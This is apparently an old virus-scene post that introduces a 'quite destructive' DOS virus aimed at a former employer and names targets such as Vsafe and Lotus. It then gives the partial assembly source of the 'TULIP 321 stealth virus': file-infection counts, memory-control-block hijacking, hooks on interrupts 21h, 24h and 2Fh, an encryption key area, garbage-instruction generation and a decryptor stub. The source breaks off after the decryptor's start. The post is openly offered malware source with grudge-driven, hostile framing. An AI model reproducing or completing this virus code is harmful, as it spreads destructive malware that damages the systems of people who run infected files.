Hot Potatoes for Jewhaters

This is the start of the last one in a series of quite destructive viruses connected with my last employer of antisemitic infamy. This is just the start; we're not interested in actually spreading the code to the winds.

It targets Vsafe, Lotus and so on.

;==========================================================================
; ASSEMBLY OF THE TULIP 321 1.15 STEALTH VIRUS, LENGTH 2636 BYTES
;==========================================================================

.MODEL SMALL
.RADIX 16
.STACK 100H

CODE SEGMENT BYTE
ASSUME CS:CODE,DS:CODE,ES:CODE,SS:CODE
ORG 100H

INCLUDE STRUCT.ASM

;--------------------------------------------------------------------------
; DEFINITIONS OF MEMORY WORKSPACE AND CONSTANTS
;--------------------------------------------------------------------------

;Constants
Files_To_Infect EQU 5H ;Amount of files to infect at one DIR
CodeSize EQU EoC-SoC ;Amount of program code
CodeSize_Paras EQU CodeSize/10H ;Amount of program code in paragraphs
MemReq EQU CodeSize_Paras+DataArea.StackTop/10 ;Space required in paragraphs
MemReq_w_MCB EQU MemReq+1 ;Space required including MCB
DosOwned EQU WORD PTR 08H ;MCBOwner =08->Owned by DOS
MiddleBlock EQU BYTE PTR 'M' ;ChainFlag=M ->Not last block
LastBlock EQU BYTE PTR 'Z' ;ChainFlag=Z ->Last block
VirusSign EQU 'Tu' ;Signature of virus

;Absolute references inside code
AbsDOSVersion EQU DOSVersion - SoC
AbsBootCnt EQU BootCnt - SoC

AbsInt03Handler EQU Int03Handler - SoC
AbsInt21Handler EQU Int21Handler - SoC
AbsInt24Handler EQU Int24Handler - SoC
AbsInt2BHandler EQU Int2BHandler - SoC
AbsInt2FHandler EQU Int2FHandler - SoC

AbsRequestReturn EQU RequestReturn - SoC
AbsBackToDOS EQU BackToDOS - SoC
AbsEncryptedArea EQU EncryptedArea - SoC
AbsGarbageDOSCalls EQU GarbageDOSCalls - SoC
AbsGarbageInstructions EQU GarbageInstructions - SoC
AbsMathFunc EQU MathFunc - SoC

DataArea EQU SavedStart - SoC
OfsFromEOF EQU CodeSize - DataArea
LWholeCode EQU (BootCnt - EncryptedArea)/2

;--------------------------------------------------------------------------
; DEFINITIONS OF STRUCTURES
;--------------------------------------------------------------------------

SavedIntList_Struc STRUC
Int03 DW 2 DUP (?)
Int13 DW 2 DUP (?)
Int21 DW 2 DUP (?)
Int24 DW 2 DUP (?)
Int2F DW 2 DUP (?)
SavedIntList_Struc ENDS

NameBuffer_Struc STRUC
BufferIndex DW ?
NameBuffer DW 100 DUP (?)
NameBuffer_Struc ENDS

Work_Data_Area STRUC
EXEHeader EXE_Header
SavedSP DW ?
SavedSS DW ?
SavedAttribute DB ?
Relocation_Flag DB ?
SavedAX DW ?
SavedDX DW ?
HandlerStart DW ?
EncryptionKey DW ?
CntReg DB ?
PosReg DB ?
KeyReg DB ?
ProgIP DW ?
SaveSeg DW ?
DOS_Seg DW ?
DOSSize DW ?
RetAddr DW ?
DPL Dos_Parameter_List
SavedIntList SavedIntList_Struc
EncryptArea DB 0A60h DUP (?)
FCBBuff DB 80h DUP (?)
NameBuff NameBuffer_Struc
StackBottom DB 200h DUP (?)
StackTop DB 0FFh

WORK_DATA_AREA ENDS

;--------------------------------------------------------------------------

JMPF MACRO SEG,OFS
DB 0EAH
DW OFS
DW SEG
ENDM

StartProg:
JMP SoC
MOV AH,4C
INT 21
;--------------------------------------------------------------------------
; AREA OF DECRYPTOR
;--------------------------------------------------------------------------
SoC:
DB 58h DUP (90)
